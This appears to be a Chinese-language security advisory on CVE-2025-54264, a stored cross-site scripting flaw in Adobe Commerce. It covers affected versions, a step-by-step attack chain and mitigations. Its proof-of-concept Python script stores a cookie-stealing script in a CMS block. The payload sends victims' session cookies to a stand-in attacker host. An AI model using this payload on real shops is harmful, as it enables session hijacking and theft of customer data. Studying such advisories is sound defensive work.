CVE-2025-54264：Adobe Commerce存储型XSS漏洞导致会话劫持

漏洞信息

漏洞编号

CVE-2025-54264

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Adobe Commerce (Magento)

漏洞概述

CVE-2025-54264是Adobe Commerce产品中存在的一个高危存储型跨站脚本（Stored XSS）漏洞，CVSS评分为8.1。该漏洞影响Adobe Commerce 2.4.9-alpha2、2.4.8-p2、2.4.7-p7、2.4.6-p12、2.4.5-p14、2.4.4-p15及更早版本。

该漏洞允许具有高权限的攻击者向易受攻击的表单字段中注入恶意脚本。当受害者浏览包含该漏洞字段的页面时，恶意JavaScript将在受害者浏览器中执行。成功利用此漏洞的攻击者可以实现会话接管（Session Takeover），从而将机密性和完整性影响提升至高级别。

该漏洞的利用需要用户交互，受害者必须主动浏览到包含漏洞字段的页面。漏洞的作用域（Scope）发生了变化，表明攻击者的权限范围可以从受影响的组件扩展到其他组件。由于Adobe Commerce作为全球广泛使用的电子商务平台，处理大量敏感的用户数据和交易信息，因此该漏洞对在线零售商和消费者构成严重威胁。

Adobe已通过APSB25-94安全公告发布修复补丁，建议所有使用受影响版本的用户尽快更新到安全版本，以防止潜在的攻击和数据泄露风险。

技术细节

该漏洞属于存储型XSS（Stored Cross-Site Scripting），其技术原理如下：

1. **输入验证缺失**：Adobe Commerce的某些表单字段未对用户输入进行充分的过滤和编码，允许高权限攻击者将恶意JavaScript代码作为正常数据提交并存储到服务器端数据库中。

2. **持久化存储**：与反射型XSS不同，存储型XSS的恶意载荷会被持久化保存在服务器端（如商品描述、评论、用户配置等字段），每当受害者访问包含该字段的页面时，恶意脚本都会自动执行。

3. **权限要求**：漏洞利用需要高权限（PR:H），意味着攻击者需要拥有管理员或具有内容编辑权限的账户才能注入恶意脚本。这通常通过以下途径实现：
- 盗取的凭据
- 社会工程学攻击获取管理员权限
- 利用其他漏洞提升权限

4. **攻击载荷执行**：当受害者（通常是普通用户或其他管理员）浏览到包含恶意脚本的页面时，浏览器会解析并执行注入的JavaScript代码，攻击者可以：
- 窃取会话Cookie实现会话接管
- 劫持用户身份执行未授权操作
- 重定向用户到钓鱼页面
- 篡改页面内容
- 提取敏感信息（如支付数据、个人信息）

5. **作用域变化（S:C）**：CVSS向量中Scope为Changed，表明漏洞的影响范围超出了受影响的组件，攻击者可以利用XSS漏洞进一步攻击与Adobe Commerce集成的其他系统或服务。

6. **利用条件**：需要用户交互（UI:R），受害者必须主动访问受感染的页面，这降低了自动化大规模攻击的可能性，但通过钓鱼邮件或恶意链接仍可实现定向攻击。

攻击链分析

STEP 1

初始访问

攻击者通过钓鱼、社会工程或凭据填充等方式获取Adobe Commerce管理员或高权限账户的登录凭据。

STEP 2

权限验证

使用获取的高权限凭据登录Adobe Commerce管理后台，确认拥有编辑表单字段（如商品描述、CMS块、分类名称等）的权限。

STEP 3

恶意载荷注入

在存在漏洞的表单字段中输入精心构造的恶意JavaScript代码（如窃取Cookie的脚本），由于缺乏输入过滤和输出编码，脚本被成功提交。

STEP 4

载荷持久化存储

恶意JavaScript代码被存储到服务器端数据库中，与正常数据一样持久化保存，等待受害者触发。

STEP 5

诱导受害者访问

攻击者通过钓鱼邮件、恶意链接或其他社交工程手段诱导受害者（普通用户或其他管理员）访问包含恶意脚本的页面。

STEP 6

脚本执行与会话劫持

受害者浏览器加载页面时自动执行恶意JavaScript，窃取会话Cookie，攻击者利用被盗Cookie接管受害者会话。

STEP 7

权限提升与数据窃取

利用劫持的管理员会话，攻击者可以执行未授权操作，包括窃取客户数据、支付信息、修改商品价格等高危操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54264 - Adobe Commerce Stored XSS PoC
# This PoC demonstrates how a high-privileged attacker can inject
# malicious JavaScript into vulnerable form fields in Adobe Commerce.

import requests
from bs4 import BeautifulSoup

# Configuration
TARGET_URL = "https://target-adobe-commerce-site.com"
ADMIN_USERNAME = "attacker_admin"
ADMIN_PASSWORD = "password123"
MALICIOUS_PAYLOAD = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie;</script>'

def exploit_stored_xss():
    """
    Step 1: Authenticate as a high-privileged admin user
    Step 2: Navigate to a vulnerable form field (e.g., product description,
            CMS block, category name, etc.)
    Step 3: Inject malicious JavaScript payload into the form field
    Step 4: Submit the form to store the payload persistently
    Step 5: When a victim visits the affected page, the script executes
    """
    session = requests.Session()

    # Step 1: Login as admin
    login_url = f"{TARGET_URL}/admin"
    login_page = session.get(login_url)
    soup = BeautifulSoup(login_page.text, 'html.parser')
    form_key = soup.find('input', {'name': 'form_key'})['value']

    login_data = {
        'login[username]': ADMIN_USERNAME,
        'login[password]': ADMIN_PASSWORD,
        'form_key': form_key
    }
    session.post(login_url, data=login_data)

    # Step 2 & 3: Inject payload into a vulnerable field
    # Example: Injecting into a CMS block or product field
    vulnerable_endpoint = f"{TARGET_URL}/admin/cms_block/save/"
    payload_data = {
        'title': 'Special Offer',
        'content': MALICIOUS_PAYLOAD,  # Stored XSS injection point
        'form_key': form_key
    }

    # Step 4: Submit and store the payload
    response = session.post(vulnerable_endpoint, data=payload_data)

    if response.status_code == 200:
        print("[+] Malicious payload stored successfully!")
        print("[+] Waiting for victim to visit the page...")
        print("[+] When victim browses the page, their session cookie will be exfiltrated")
    else:
        print("[-] Failed to store payload")

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Adobe Commerce 2.4.9-alpha2

Adobe Commerce 2.4.8-p2

Adobe Commerce 2.4.7-p7

Adobe Commerce 2.4.6-p12

Adobe Commerce 2.4.5-p14

Adobe Commerce 2.4.4-p15

Adobe Commerce < 2.4.4-p15（更早版本）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并限制具有内容编辑权限的管理员账户数量；2）部署Web应用防火墙（WAF）规则，过滤常见的XSS攻击向量（如<script>标签、事件处理器等）；3）实施内容安全策略（CSP），限制内联脚本执行；4）为所有会话Cookie设置HttpOnly标志，防止通过JavaScript窃取；5）监控管理后台的异常活动，特别是涉及表单字段修改的操作；6）对用户输入实施白名单过滤，仅允许合法字符；7）定期检查数据库中存储的内容，查找可疑的脚本注入痕迹。